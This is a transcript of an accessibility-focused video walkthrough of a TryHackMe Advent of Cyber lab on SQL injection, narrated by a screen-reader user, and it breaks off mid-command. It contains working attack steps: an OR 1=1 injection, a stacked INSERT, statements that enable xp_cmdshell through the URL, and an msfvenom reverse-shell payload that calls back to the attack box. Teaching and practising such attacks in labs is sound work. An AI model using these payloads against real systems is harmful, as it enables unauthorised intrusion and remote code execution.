Hello, hello, welcome to day 10, which is task 16 of the Advent of Cyber TryHackMe Accessibility Showcase 2023 blah blah exclamation point extreme super awesome version extremo. The working title for this video is Redemption Arc? Question mark? Because that really is what I'm seeing today. It's night and day compared to what I was doing yesterday. The accessibility has it's quite a bit better on this one. It's actually the best I've seen so far in this AOC. So that is definitely praiseworthy, and I'll start with doing that. Yesterday was gloomy and dark, and today we can actually use the party horn what it was meant for. Well done, whoever made this thing. It's good. And we're gonna see the proof of that in the coming... what I'm told is a rather long challenge, so this is gonna be a pretty bit of a long watch. But we should still have fun. The title is SQL Injection. Inject the holes with exec queries. Queries, rather. Well then. So a lot of SQL or SQL or whatever you'd like to call them today. It sounds like. Let's just start starting up machines, because we need both the attack box and the regular thingy here. Also, let me really quickly just make sure that I'm still in the VPN. I haven't restarted this computer ever since I started this series. I don't know if it resets your connection after a bit or something. So let's just really quickly make sure. Let's see. Yeah, I just want to see what things were enacted to. Yeah. Let's see. Scroll up. We are apparently in EU regular 2, and we have the internal IP of 10.9.152.243. Sounds good. You can hack me. No, please don't do that. Anyway, we can start with this. This is good. I'll start with the attack box, because I need the IP for that first and foremost, and then afterwards we can start the machine. We're gonna need both, and it'll take a bit to load. I guess it's a good thing that we have a lot of text to read. Yeah, well that's loading. That's starting up now. It's gonna take how long? Doesn't even show me. Oh, it does. 106 seconds for the first one, so that's almost 2 minutes of me talking. That's fine. So, the story. First thing we see is a colorful illustrated wreath banner for day 10, adorned with various ornaments. The ornaments include a festive spray can, a no entry sign, a medical syringe, and a cleaning sponge. This is the first time we actually know what's on the banner. I love that they did this. I've been moaning about these for like the last 10 days, and apparently someone up there has heard me. So that's kind of amusing. I like it. The Best Festival company started receiving many reports that their company website, bestfestival.thm, is displaying some concerning information about the state of Christmas this year. After looking into the matter, Santa's Security Operations Center, SSOC, confirmed that the company website has been hijacked and ultimately defaced, causing significant reputational damage. To make matters worse, the web development team has been locked out of the web server, as the user credentials have been changed. With no other way to revert the changes, Elf Exploit McRed has been tasked with attempting to hack back into the server to regain access. I love that. Exploit McRed. After conducting some initial research, Elf Forensic McBlue came across a forum post made on the popular black hat hacking internet forum Jingle Hacks. The post made earlier in this month. I got yanked. I got yangled. Let me grab this IP. We need it later. 10.10.57.93. Okay, copy that. Just a second while I note these details down real quick. My little notepad. You know the one. There. Yeah, we're actually going to need the reverse shell functionality today, apparently. Username, root, password is this thing. I'll just copy that over. Not sure when we're going to be needing it, but I'll just make sure we have it. There we go. Now we can dismiss this particular thing and start the actual machine, because it apparently takes quite a bit to start, so we'll just make sure we have that going. We won't need to see that, so that's actually good. What was that? Oh yeah, jingle hacks. You're reading about jingle hacks. With an X at the end, of course, like proper hacksaws. The post made earlier in the month explains that the poster is auctioning off several active vulnerabilities related to Best Festival Company systems. We have an alt text with the image with the alt text, a screenshot of a forum post on the site called Jingle Hacks. The author of the post has the username Greedster. The post reads, "Hello Jingle Hacks forums. As the merger of Best Festival Company approaches, I find myself in possession of knowledge that's as good as gold. I've decided to auction off these vulnerabilities to the highest bidder. The stakes are high and the potential rewards are even higher. If you've got the skills and resources to make use of this information, you're in for a serious payday. I won't reveal all the details here, but I can confirm that these vulnerabilities are both 0 days and known issues that Best Festival Companies hasn't addressed. The treasure includes potential entry points, data access, and even the possibility of exposing classified information. To bid, reply to this thread with your offer. I'll provide a secure channel for the winning bidder to transfer payment." This forum post, well, I mean, this is definitely McGreedy. Like, you know, name is Greedster with 3s for the E. Now, I don't know this for sure, but that description reads awfully similar to what ChatGPT would tell me. So I'm wondering if someone's taken the leaf out of my book and it's just using AI to generate these alt texts. If they are doing that, that is no problem whatsoever. It did it perfectly, so I have no problem with this. I'm just curious if that's what they did, because, I mean, I've been doing it in these videos, so I mean, I would be kind of a hypocrite if I gave them slack for that. And if it works well, then sure, why not? I like it. So, if this was AI, well done. If it wasn't AI, even better done, because it's actually really well written. All right. This forum post surely explains the havoc that has gone on over the past week. Armed with this knowledge, Exploit McRed began testing the company website from the outside to find the vulnerable components that led to the server compromise. As a result of McRed's thorough investigation, the team now suspects a possible SQL injection vulnerability. I'm gonna read it SQL just for clarity. I know it's often pronounced SQL, but I'm just going to read SQL. Learning objectives. In today's task, you will learn to understand and identify SQL injection vulnerabilities. Exploit stacked queries to turn SQL injection into remote code execution. Damn. Help Elf McRed restore the Best Festival website and save its reputation. Deploying the virtual machine. Before moving forward, review the questions in the connection cards shown below. We have 10. What would show you today? Connection card details just says start the attack box and target machine. We've done that. Given that the attached, actually, let me really quickly jump down here and make sure that that's not covering the screen a bunch. Oh, it's not. Okay, that's fine. Yeah, we won't actually need anything from that, so I'm not even going to open it up. It's just the IP we'll need, and that's in the actual questions later, so that's fine. Learning objectives. Now we're gonna do an SQL primer, because that's maybe something a lot of people may not be familiar with. So I'm gonna have to read all this, or I might have the computer do it. We'll have to see. Let's see. Given that the attached VM requires several services to initialize, it is a good idea to click the Start Machine button in the top right corner of this task now. Please allow the machine at least 5 minutes to fully deploy before interacting with it. To complete the practical, You can use the attack box or your VM connection. You will receive VPN connection. You'll receive further informations on accessing the Best Festival website after a brief refresher on SQL and SQL injection. Okay. This bit the computer can read, because I'm not going to. Let's see. Oh, my bad.
Speech mode talk.
The music a little low if we're doing that. Hang on. There. Perfect. All right.
Speech structure query language. LinkSQL is essential for working with relational databases and building dynamic websites. Even if you've never explicitly used LinkSQL before, chances are you frequently interact with databases. Whether you're checking your bank account balance online, browsing through products on an e-commerce website, or posting a status on social media, you're indirectly querying and altering databases. SQL is one of the most popular languages that make this all possible. Relational databases are structured data collections organized into tables, each consisting of various rows and columns. Within these collections, tables are interconnected with predefined relationships, facilitating efficient data organization and retrieval. For example, relational database might include tables for customers, orders, and products with relationships defined to link customer information to their respective orders through the use of identifiers. Graphic clickable A diagram illustrating 3 different tables within a relational database. Table 1 is titled Graphic clickable customers and contains the column titled customer id. This column is linked to the customer. Graphic clickable column in the second table titled orders. A column in the orders table is titled product ordered. Graphic clickable and links to the product id column in the third table titled products. Linking these 3 tables. Graphic clickable together illustrates how the unique ID from one table can be intrinsically linked to a relational graphic clickable column in another table. This is the foundation of how relational databases operate.
It really reads like an AI description. I love it though.
LinkSQL provides a rigid way to query, insert, update, and delete the data stored in these tables, allowing you to retrieve and alter databases as needed. A website or application that relies database must dynamically generate LinkSQL queries and send them to the database engine to fetch or update the necessary data. The syntax of LinkSQL queries is based on English and consists of structured commands using keywords like select, from, where, and join to express operations in a natural language-like way.
That is true. I've never found it particularly intuitive, but that might just be me. I've never really been a huge fan of SQL or SQL, as it were. You get phrases like select star from table name where x equals y, and that's fine. But then the joins come in where you have to yank in the data from other tables, and it just becomes a little messy in my view. But it's certainly doable.
We'll leverage an example of a database table to represent the tracking and cataloging of Christmas tree ornaments. The table and column structure might look something like this: ornament id, elf id, color, category, material, created, price.
Yeah, these are the column names, and then here we have actual records. So we have 124, red, ball, glass, a date,
5.99,
and a price. Yeah. We'll scroll to the bottom of this page on this table.
Edge of tape 1 on silver, snowflake, plastic, 22.4. In the simple example above, we have defined the database table TPL ornaments to store ornaments with various columns that provide characteristics or qualities related to each item. We can run various LinkSQL queries against this table to retrieve, update, or delete specific data. For example, select star from TPL ornaments where material equals wood.
Yeah, so that will retrieve everything that has wood as the material.
This select statement returns all columns for the ornaments where the material is specified as wood. Select ornament id, color, category from TPL ornaments where elf id equals 102. This select statement will return all the ornaments created by the elf with the ID 102. Unlike the first statement, this query only returns the ornament's ID, color, and category. Insert into TPL ornaments, ornament id, elf id, color, category, material, date created, price. Values, 5, 105, blue, star, glasses, 2023-12-10, 4.99.
Yeah, I've never liked this syntax for it. Like, I don't understand why they don't just do column name equals so, column name equals so, column name equals so. Just keep it compact. Now you have this really weird, like, first define the number of columns, like the order of columns, and then put the values, and then put the values in the exact right order. It's really annoying to do. Like, you'd think that they would have thought of this, keeping those a little closer together, but that's apparently not really happening. I'm also noticing that a couple of system sounds are bleeding through. I'm just making sure that's turned off now. There we go.
Speech values, 5. This insert statement adds a new ornament to the table created by the elf with the ID 105 and the specified values for each column. Link PHP. Link PHP is a popular general-purpose scripting language that plays a crucial role in web development. So
this is actually PHP, not Link PHP, but because it's a little glossary thing that you can click, the screen reader will pronounce Link PHP because it is technically a link you can click.
It enables developers to create dynamic and interactive websites by generating HTML content on the server and delivering it to the client's web browser. PHP's versatility and seamless integration with SQL databases make it a powerful tool for building feature-rich dynamic web applications.
Yeah, and people give it a lot of shit for that, but it's actually a pretty nice language these days. It was quite bad, and a lot of the older PHP code still is pretty bad and rifled with vulnerabilities, but these days PHP is really not that terrible. And go play with PHP 8.2 and 8.3 and just have a good time. loads of dollar signs to be had for sure.
Link PHP is a server-side scripting language, meaning the code is executed on the web server before the final HTML is sent to the user's browser. Unlike client-side technologies like HTML, CSS, and JavaScript, Link PHP allows developers to perform various server-side tasks, such as connecting to a wide range of databases, such as MySQL, PostgreSQL, and Microsoft SQL Server, executing SQL queries, processing form data, and dynamically generating web content.
So, yesterday's drinking game was overwhelming. Every time you see the word overwhelming, take a shot. I guess this time the shot to be taken is when you see the term SQL, because it's going to come up a lot. All right.
Graphic clickable, a graphic illustration of a web server serving PHP files to produce a dynamic page on the web. Graphic clickable browser. As the web browser requests a PHP page on the web server, the server reaches out to a graphic clickable MySQL database server running internally. After obtaining the data from the database, the web graphic clickable server uses PHP to generate a dynamic page for users at runtime. The most common way for link
Yeah, that is a pretty good explanation of how that diagram looks, I'm pretty sure. Like, that's really how it works.
The most common way for link PHP to connect to SQL databases is using the link PHP data objects, PDO, extension or specific database server drivers like MISCLI for MySQL or SQL SRV for Microsoft Link SQL. Server, MSSQL. The connection is typically established by providing parameters such as the host, username, password, and database name. After establishing a database connection, we can execute link SQL queries through PHP and dynamically generate HTML content based on the returned data to display information such as user profiles, product listings, or blog articles. Returning to our example, if we want our PHP script to fetch information regarding any green colored ornaments, we could introduce the following lines. // execute and link SQL query. $query equals select star from TPL ornaments where color equals green. $result equals SQL SRV query. $con, $query. In the above snippet, we first save our link SQL query into a variable named $query.thisQuery. Instructs the database to retrieve all rows from the TPL ornaments table where the color column is set to green. We then use the SQL SRV query function to execute this query by passing it to a database connection object $con. You can think of the $result variable as a container that holds the outcome of the link SQL query, allowing you to iterate through the rows and access the data within those rows. Later in the script, you can use this result object to fetch and display data, making it a crucial part of the process when working with databases in PHP.
Yep, well, that's usually handled by a framework these days. But yes, if you were completely close to the metal, which I know is ironic when speaking about PHP, but if that's what you're doing with vanilla PHP, this is how you would do it. And makes a lot of sense. I'll start reading a little bit now because I think we get some interesting stuff now. User input. While the ability to execute SQL queries in PHP allows us to interact with our database, the real power of database-driven web applications lies in making these queries dynamic. In our previous example, we hard-coded the query to fetch green ornaments. However, real-world applications often require users to interact with the data. For instance, let's imagine we want to provide users with the ability to search for ornaments of their choice. In this case, we need to create dynamic queries that can be adjusted based on user input. One common way to take in user-supplied data is in web applications is through get parameters. They're also known as query parameters. They don't say that here, though. These parameters are typically appended to the URL and can be accessed by PHP. They allow users to specify their search criteria or input, making it a valuable tool for interactive web applications. We could create a simple search form with an input field for users to specify the color of ornaments they want. Upon submitting the form, the website makes a GET request to the search results page, including the user's search parameters within the URL. PHP can access that user's input and in the GET parameter and dynamically generate a query based on that input. You have a code sample where that's shown off. We show you that $_get is the way to do that. I don't think anyone really does that anymore. I think people use the request object now, but this is how it used to be in the old PHP, where like you literally just have a get array that has all the _get array that has all the stuff in it. I'm amused by this because I did this once at an actual job and people like grumbled at me like, really? You're going to do it this way? So I'll grumble for the person that is not here to grumble at the person who wrote this. To be fair, I would also have to explain object-oriented programming at that point, so I understand the choice. Execute notice this comment. Execute an SQL query with the user supplied variable. Yeah. So that's another call to query. Yeah. Select star from TBL ornaments where color equals $color. That's pretty much what we just saw, but with the variable spliced in, and then the same thing again. The above snippet sets the color variable to the retrieved value of the color URL parameter. That variable then gets passed into the query string. I'm not reading the $signs, but they're there. This is PHP. Every variable starts with a $sign. Now users can dynamically control the query being executed by the database simply by modifying the URL parameter they include in their request. For example, http:/example.thm/ornaments search php $color equals green. a graphic illustration of how the color URL parameter can be retrieved and used to run queries. It depicts a web browser with a URL, example.thm/ornaments, that's what I just said basically. Below it, the PHP code color $color equals $_get color extracts the value. Finally, this value is essentially just a so this is really amusing. Basically, this is an AI. I'm pretty sure at this point this is generated alt text, and this is really just an image of what they've already shown us in text. So the people who want to look at pretty pictures, they can see it in one glance, which means we are actually getting a little bit of duplicate information. It's not a really bad thing. It's fine, but it amuses me that we have that first world problem now. This simple example shows how powerful PHP and SQL can be in creating rich dynamic websites. SQL injection, SQLI. Taking in user-supplied input gives us powerful ways to create dynamic content, but failing to secure this input correctly can expose a critical vulnerability known as SQL injection, or SQLI. SQL injection is an attack technique that exploits how web applications handle user input, particularly in SQL queries. Instead of providing legitimate input, like the ornament color in the example above, the attacker injects malicious SQL statements into a web application's input fields, or parameters. The application's database server then executes this rogue SQL query. SQL injection vulnerabilities pose a considerable risk to web applications, as they can lead to unauthorized access, data theft, data manipulation, or even the complete compromise of a web server and its underlying database through remote code execution. If an attacker can control which queries the database executes, they can control the database functions performed and the data returned. As such, the impact can be catastrophic, ranging from exposing sensitive user information to causing significant data breaches. SQL injection vulnerabilities continue to be highly pervasive despite numerous advancements to mitigate them. This type of vulnerability is featured prominently in the OWASP Top 10 list of critical web application security risks. AO3:2021-injection. Honestly, that's true. Any course you do on web application hacking and bug bounty, you see this thing come up over and over and over again. When a web application incorporates user input into SQL queries without proper validation and sanitization, it opens the door to SQL injection. For example, consider our previous PHP code for fetching user input to search for ornament colors. Retrieve the get parameter and save it as a variable. Okay, so we're doing the same thing here. We're setting the variable. They're essentially just reminding us what we did before. It's the same code sample as before. Without adequate security measures, an attacker could manipulate the color parameter to execute malicious SQL queries. For instance, instead of searching for a benign color, didn't expect that word, benign color, they might input input a tick character or 1=1 as the input 1=1 - as the input parameter, which would transform the query into select star from tbl_ornaments where color equals ... or 1=1 ... Oh, okay, so that's one thing. As the query above shows, the attacker injected the malicious payload into the dynamic query. Let's take a look at the payload in more detail.
Speech space tick space O R space I S. Speech mode off.
Tick and then OR is part of the injected code, where OR is a logical operator in SQL that allows for multiple conditions. In this case, the injected code appends a secondary where condition in the query. 1 equals 1 is the condition following the OR operator. This condition is always true because in SQL, 1 equals 1 is a simple equality check where the left and right sides are equal. Since 1 always equals 1, this continues it always evaluates to true. The dash at the end of the input is a comment in SQL. It tells the database server to ignore everything that comes after it. Ending with a comment is crucial for the attacker because it nullifies the rest of the query and ensures that any additional conditions or syntax in the original query are effectively ignored. The condition color equals quote quote is empty, and the OR 1 equals 1 condition is always true, effectively making the entire where condition true for every row in the table. The graphic illustration of how the color URL parameter can be exploited to retrieve all the results in the database by injecting tick or 1 equals 1 dash dash. After the PHP code extracts the value, it is passed to the query. This malicious query breaks out of the original intended statement and injects the second condition to return true. As a result, all ornaments, regardless of their color, are returned to the user. So this is a pretty contrived example, but yes, that's exactly how it works. You could do that, for example, for users as well. As a result, this SQL injection successfully manipulates the query to return all rows from the table ornaments table, regardless of the actual ornament color values. This is a classic example of an SQL injection payload, where the attacker leverages the OR 1 equals 1 condition to bypass any intended conditions or logic in the query and retrieves data they are not supposed to access. A caution around OR 1 equals 1. It's crucial to emphasize the potential risks of using the OR 1 equals 1 payload. While commonly used for illustration, injecting it without caution can lead to unintended havoc on a database. When injecting OR 1 equals 1 into a query, the intention is typically to bypass authentication or to return all items in the table by making the conditions always true. However, the risks lie in that you might not be aware of the context and scope of the query you're injecting into. Additionally, applications may sometimes use values from an initial request in multiple SQL queries. SQL injection payloads that return all rows can lead to unintended consequences when injected into different types of statements, such as update or delete. Imagine injecting it into a query that updates a specific user's information. An OR 1 equals 1 payload would make the condition true for every row, leading to a mass update affecting all records users in the table. This lack of specificity in the payload makes it a risky choice for penetration testers, who might inadvertently cause significant data losses or alterations. A safer example would be a more targeted condition based on a known attribute identifying the record you want to manipulate. For instance, Bob and 1 equals 1 dash dash would update Bob's record, while Bob and 1 equals 2 would not. This still demonstrates the SQL injection vulnerability without putting the entire table's records at risk. For a practical example, check out the lesson learned room. Fortunately, the development team behind the Best Festival website has confirmed that the website does not run any unpredictable queries and has permitted us to use this payload to demonstrate the vulnerability. So we get to use OR equals 1, or 1 equals 1. Stacked queries, I have to computer read this again because this is a little bit more technical. The other thing was too, but I figured I'd just have this time in the limelight, as it were. And we do want to get to the challenge as well, so I'm trying to hurry this along a little bit.
Speech mode off over stacked queries. Link SQL injection attacks can come in various forms. A technique that often gives an attacker a lot of control is known as a stacked query. Stacked queries enable attackers to terminate the original intended query and execute additional link SQL statements in a single injection, potentially leading to more severe consequences such as data modification and calls to stored procedures or functions. In link SQL, the semicolon typically signifies one statement's conclusion and another's commencement. This feature facilitates the execution of multiple SQL statements within a single interaction with the database server. It's important to note that certain web application technologies and database management systems, DBMS, may demand different syntax or lack support for stacked queries.
Yeah, you may also have to use go, for example, to go from one statement to the next. It depends.
Consequently, enumeration is essential for precision when conducting injection attacks.
That is a very cryptic statement for beginners, but basically what that means is make sure you know what you're attacking before you start attacking it.
Suppose our attacker in the previous example wants to go beyond just retrieving all rows and intends to insert some malicious data into the database. They can modify the previous injection payload to this. Insert into TPL ornaments, lfid, space, tick.
So you pretty much always start with a tick or like a quote character to close the current quote. And then you do a semicolon and then you do your query. So insert into terms, the whole thing. There's an example here that says insert into table ornaments, elf ID, color, category, material, price, and then the values are 109, evil, red, broken candy cane, coal, 99.99, and then you do another dash so you don't get in trouble with quotes that may or may not follow this particular thing. So at that point, you just ignore the rest of the line.
When the web application processes this input, here's the resulting query the database would execute. Select star from TPL ornaments, where color equals insert into TPL ornaments, lfid, color, category, material, price, values, 109, evil, red, broken candy cane, coal, 99.99. Now,
the screen reader doesn't read all the punctuation. I can cheat with Braille at the moment, but it's there. Like, you can have it read. I can actually demonstrate if I turn this up.
Symbol level all. Select star from TPL line ornaments, where color equals tick tick semi insert into TPL line ornaments left parent, elf line in comma, color comma, category comma, material comma, price right parent, values left parent, 109 comma, tick evil red tick comma, tick broken candy cane tick comma, tick coal tick comma, 99.99 right parent, semi dash dash tick.
So yeah, that's why we turned that off.
Symbol level.
Takes forever.
As a result, the attacker successfully ends the original query using a semicolon and introduces an additional link SQL statement to insert malicious data into the TPL ornaments table. This showcases the potential impact of stacked queries, allowing attackers to not only but also perform permanent data modification. Testing for link SQL injection. Graphic clickable A vector graphic of exploit McRed. He is a tiny elf sporting a red beanie as he is on the red. Graphic clickable team. He has a long beard and is leaning on the candy cane. In one hand, he is holding a bag adorned. Graphic clickable.
Okay, wait. I want to read this myself. This is great. So we have an alt text of this exploit elf McRed. Which reads the following. A vector graphic of exploit McRed. He is a tiny elf sporting a red beanie as he is on the red team. He has a long beard and is leaning on a candy cane. In one hand, he is holding a bag adorned with a skull. Inside the bag contains seemingly malicious magical exploits. Testing for SQL injection is a critical aspect of web application security assessment. It involves probing the application to identify vulnerabilities where an attacker can manipulate user-supplied input to execute unauthorized SQL queries. To continue our mission, let's navigate to the Defaced Best Festival Company website to see if we can identify vulnerable input that leads to SQL injection. If you haven't already, click the Start Machine button in the top right corner of this task. Please allow the machine at least 5 minutes to fully deploy before interacting with it. You can use either your VPN connection or the attack box by clicking on the blue Start Attack Box button in the. We'll use a combination of both actually. From here, visit 10.10.180.179 in the web browser. I'm going to bring up that page. These work? Yeah, there it is. So, Best Festival Company logo. Let's see what they've done to the place. Meet the elves, gift search, contact. Probably the gift search what we want to look at. Welcome to Santa's workshop. This all looks good. Cheerful, mischievous elves. Oh, cheerful has been sliced, like sort of struck through. Mischievous elves are hard at work, assembling Christmas toys and preparing for the most magical. Boring! So essentially what they've done is they've deleted some words with strike-throughs and just like all caps alternatives. So magical has been changed to boring season of the year.
Speech mode. Welcome toys and preparing for. Keep an eye out for thrilling up toys. Welcome to Santa's workshop. Our deleted cheerful mischievous elves are hard at work assembling Christmas toys and preparing for the most deleted magical boring season of the year. Santa Claus wrap gift. Keep an eye out for thrilling updates from the deleted worst deleted festival grumpy company as we expand our reach to spread happiness worldwide. Sending you deleted festive terrible greetings and holiday cheers.
Terrible greetings. Well, thank you.
Notice Christmas has been cancelled this year. We do not apologize for any inconvenience.
Notice Christmas has been cancelled this year. We do not apologize for any inconvenience.
Heading level 2. Meet the evil elves.
Well, meet the evil elves.
Speech mode off.
Okay then, he's Elf McSkitty. My favorite part about Christmas is safeguarding these. Okay, this whole thing has been removed. What have they changed into it? Introduce vulnerability. What are they doing? My favorite part about Christmas is safeguarding this. So the screen words secrets of Santa's workshop. With every technical and enchantment, we strive for to keep the magic secure. And that whole thing has been struck through and it's actually removed. And it has been replaced with introduce vulnerabilities in all caps. That's pretty clever. Okay, that has never been easy. Thanks to the worst grumpy company. So instead of best festival, they've changed it into worst grumpy. Okay, well this is fun. Let's go back to the task for now. Oh, that's the wrong one. There. Yeah. You should see the defaced best festival website. Yes, we do. I can see it. Navigate to the website as an end user to understand its functionality and offerings. Is a great place to start. Yeah, we just did that. This manual enumeration allows us to identify the areas in the application where user input is accepted and used in SQL queries. This can include search fields, login forms, and any input fields that interact with a database. You may need to navigate to the correct page containing the vulnerable component, so be sure to click on any buttons or links you find. Browse the website manually until you find a form that accepts user input and might be querying a database. After locating the gift search feature, we can confirm our suspicions by simply filling out the form with the expected values. A short animated screen capture demonstrating the gift search feature in the defaced Best Festival Company website under the gift search PHP page. In the screen capture, a user selects child for the age input, checks toys for the interest input, selects $30 for the budget input, and clicks search. After clicking search, the website redirects us to the results page. We can identify some interesting URL query parameters by looking at the URL in our browser. Gift users a PHP question, age equals child, and interest equals toys, and budget equals 30. So it's right there in the URL. The underlying PHP code is taking in the three parameters we specified for the age, interests, and budget, as separated by the ampersand character, and querying the database to retrieve the filtered results and output them to the page. Now that we've identified an area to the website where user input is accepted and used to generate dynamic SQL queries, we can test if it's vulnerable to any injection attack. To do this, we can alter the parameters to test how the application handles unexpected characters. To test the input fields, we can submit characters like single quotes and double quotes, as these are special characters that attackers use to manipulate SQL queries. You might be able to trigger error messages by introducing possible syntax errors in the query and prove that the input is unsanitized as it reaches the back end. However, the gift search feature doesn't offer any free form text inputs to type and manipulate, so we can look at modifying the URL parameters directly to test the application. To do this, alter the age parameter in the URL to include just a single quote and hit enter to load the page. Yeah, I was going to try that. So let's start our gift search. We'll just go in here, just like they say. Yeah, okay. So we'll set that to child. That is fine. That's already set to toys. Very good. There. Toys are now on. And the budget's currently set to 0. Let's set that to something else. 30 is fine. There we go. And we're going to add a quote to the age parameter. Let's try that. It's a single quote. There. Okay. Yeah, it's been HTML identified. Let's see what happens. Boom. Database query error. Array left paren left bracket 0 right bracket equals greater array equal whole thing. SQL state equals 422,000. Code equals 102. Microsoft ODBC driver. Okay, we can see this is ODBC driver. For SQL server incorrect syntax near child. So it pretty much lost its digital little mind. Let's actually have the computer read this for flair.
Speed 100 message equals greater 100 database query error array 0 equals greater 42,000 school state equals greater 42,001 equals greater 102 code equals greater 122 equals greater Microsoft ODBC driver 17 for SQL server incorrect syntax near child. Message equals greater Microsoft ODBC driver 17 for SQL server incorrect syntax near child. 1 equals greater array 0 equals greater speech mode off.
So that's good. We can actually write a couple of things down here. So this is an ODBC driver. 17 for Microsoft SQL Server. I don't know if that's going to be important later, but it's good to keep this kind of stuff on hand as we're doing enumeration here. So this whole thing blew up. Let's see what it says. You should now see an error message returned. Yep, we did. A screenshot of the error message generated from the gift search feature after indicating an invalid query. The error message reads that this is incorrect syntax near toys. It also notes this is a Microsoft Power database. The ODBC driver section of the error message is hidden and masked. Well, we got it. We wrote that down. So that's probably going to... Usually when they mask things like that, it's going to come up in a question at some point. So it's good that we wrote this down. The error we received is a huge breakthrough as it gives us many details on the underlying database management system powering this website and confirms that the user input is unsanitized. Oh, dirty. The error message shows that Microsoft SQL Server is the database manager due to the banners and driver information between the square brackets. Yeah, I saw that. The information we gather will soon be helpful. Error messages enumeration is critical to SQL injection testing because it equips attackers with valuable information for crafting more precise and effective attack payloads. Because of this, it's always essential to monitor and sanitize error messages to prevent sensitive information from leaking. This is a lot of text. Although we don't have access to the source code at this point, we can visualize what the underlying PHP script might look like. Yeah, it's pretty much a code sample of what we saw before with the color, except this time there's a couple of fields: age, interests, budget. And now we see an SQL query, and now we see that query being run with SQL Serve. As seen above, the script is likely extracting the values from the URL parameters, yes, in an unsanitized way, how dirty, directly inserting them into the SQL query to be executed. If we break out of the hard-coded query by injecting our own SQL syntax, we can manipulate the request and, consequently, the returned data. Excuse me. Let's attempt to leverage the SQL injection payload for earlier to inject our own condition on the gift search feature that will always evaluate to true. So they're essentially having us change the age thing around. I'm just going to assume that that's going to just return everything, so we're not going to explicitly do that. Let's see what the thing says. By injecting our payload and commenting out the rest of the query, We can bypass the intended filter and avoid errors to retrieve all gift results, regardless of the specified parameters. Yes, what I thought. A snippet from a gift search. Yeah, okay. We have successfully dumped the database table and returned all 636 rows to the page. This is a very simple example and a suitable proof of concept that this website is vulnerable to SQL injection. This is good to know for bug bounty hunters. Like if you want to do this and you just want to show off an SQL injection, this is how you would start. Like this is still not going to be enough for actual bug bounty because you'd want to see the actual impact. But this is a good start. However, it's unlikely that the attacker who defaced the best festival company did so by returning gift results. Let's explore possible methods to execute system commands via our newly found attack vector. And that's another bit for the computer because it's about stored procedures.
Speed cloud calling stored procedures. As mentioned, stack queries can be used to call stored procedures or functions within a database. Management system. You can think of stored procedures as extended functions offered by certain database systems serving various purposes such as enhancing performance and security and encapsulating complex database logic. The Microsoft Link SQL Server stored procedure XP shell is a specific command that allows for.
How's that spelled? XP_CMD shell.
Executing operating system calls. If we can exploit a stack query to call a stored procedure, we might be able to run operating system calls and obtain remote code execution as we previously confirmed. The database system in our example is Microsoft Link SQL Server. With that in mind, let's dive deeper into the XP shell procedure. XP shell. XP shell is a system extended stored procedure in Microsoft Link SQL Server that enables the execution of operating system commands and programs from within SQL Server. It provides a mechanism for SQL Server to interact directly with the host operating system's command shell. While it can be a powerful administrative tool, it can also be a security risk if not used cautiously when enabled. Because of the known risks involved, it's recommended that this functionality is disabled on production servers and is by default. However, that require production servers and is by default. However, due to misconfigurations and legacy applications that require it, it's common to see it enabled in the wild. For example, suppose you have an HR management system that needs to export data periodically to a CSV file and upload it to an external server. Instead of using more secure and modern methods like Link SQL Server Integration Services, SSIS, or custom application code, legacy applications may have opted to rely on XP shell to execute system-level commands to export the data. While this accomplishes the same task, it poses security and maintainability risks and grants excessive system access to the Link SQL Server. It is also possible to manually enable XP shell in Link SQL Server through execute exec queries. Still, it requires the database user to be a member of the sysadmin fixed server role or have a alter setting server level permission to execute this command. However, as mentioned previously, misconfigurations that allow this execution are not too uncommon. We can attempt to enable XP shell on the best festival company database by stacking the following commands using the Link SQL injection we discovered.
Okay, so
Exec
I'm going to read this myself because it's the screen reader isn't going to be doing a very good job of reading it in a way that makes sense. So it's exec all caps sp_configure quote show advanced options quote comma. Is it comma?
Speed comma space.
Yeah. One semicolon.
Off.
And then it says reconfigure semicolon exec sp_configure quote xp_cmd shell quote comma colon 1 semicolon reconfigure semicolon. By injecting the above statements into SQL Server, we'll first enable advanced configuration options in SQL Server by setting show advanced options to 1. We then apply the change to the running configuration via the reconfigure statement. Next, we enable the XP_CMD shell procedure by setting XPCMD to 1 and applying the change to by running the reconfigure the change by running configuration again. Okay, converting these into a single stacked SQL payload will look like this. So we actually have the URL again, which pretty much the entire thing that we just did. And I'm going to copy paste this because that's what anyone would do. We're going to just do that. Ooh, not that bit. Yeah, there you go. Okay, we're going to go here. We're going to paste this in. And we're going to run it and see what it says. We should just get regular SQL return statements at this point. Sorry, your search returned no results. Okay, well that's fair enough. By requiring with these parameters, we should be able to execute these stacked queries and enable the experience procedure. With this feature enabled, we can execute any Windows shell command through the execute or exec statement followed by the command name. Unfortunately, one of the caveats to this approach is that it returns its results as rows of text. This means that typically the output will never be returned to the users, since the injection no longer occurs in the original intended query. Because of this, we are often in the dark as to whether our injection worked. But there are ways to validate whether or not our approach is working. Remote code execution. Now we get to the fun bit. And also the final bit of text, I think, soonish, because let's confirm if we have remote code execution by attempting to execute certutil.exe on the target machine. This command is a native Windows command line program installed as part of certificate services. It's handy in engagements because it is a binary signed by Microsoft and allows us to make HTTPS connections. In our scenario, we can use it to make an HTTP request to download a file from a web server that we control to confirm that the command was executed. To set this up, let's create a malicious payload using MSF Venom, allowing us to eventually upgrade our SQL injected shell into a more standard reverse shell. You can think of a reverse shell as the remote computer, the best festival web server, initiating a connection back to our attack box, which we're listening for. Once the connection is established, we can gain control of the remote system and interact with the target machine directly. This is the opposite of a typical remote access scenario, where the user is the client and the target machine is the server. MS Venom is a command line payload generator tool. It's part of the Metasploit framework, a widely used penetration testing and ethical hacking set of utilities. MSF Venom is explicitly designed for payload generation and can be used to generate a Windows executable that, when executed, will make a reverse shell connection back to our attack box. We can run the following command on a Kali machine or the attack box. Well, we don't currently have access to the attack box yet, so let's actually set that up real quick. I'm just opening a command shell. We're doing SSH root at, and I'm going to go to my notes because we have that IP up here. Yep, here it is. Paste that in. There we go. It's asking me the usual thing. Yep. And I'll put the password in. There we go. We're in. Okay, so let me really quickly put this on the screen. Yep. Yep. There is our command shell. And I will type in the command and then have the screen reader read out the output. So it's msf venom-p. msf venom-p Windows/x64/shell reverse TCP. I'm going to make sure that I get that right by really quickly. Oh, that is very long. Hang on. I'm actually going to quickly copy that into a notepad so I can modify it with the right information. Only grab that bit. I need the other bit. Okay, let's get the entire command here because there's a lot of parameters here we need to go over. msf venom-p Windows/x64/shell_reverse_TCP lhost in all caps equals your.ip.address.here. So that is actually the address of our current machine that we're looking at. So that is, what is that? 10.10.57.93. I'll put that in my notes. 10.10.57.93. 93. L port is 4444. L port all caps. -f exe -o reverse.exe. Okay. So we're going to run that command. We're going to just paste 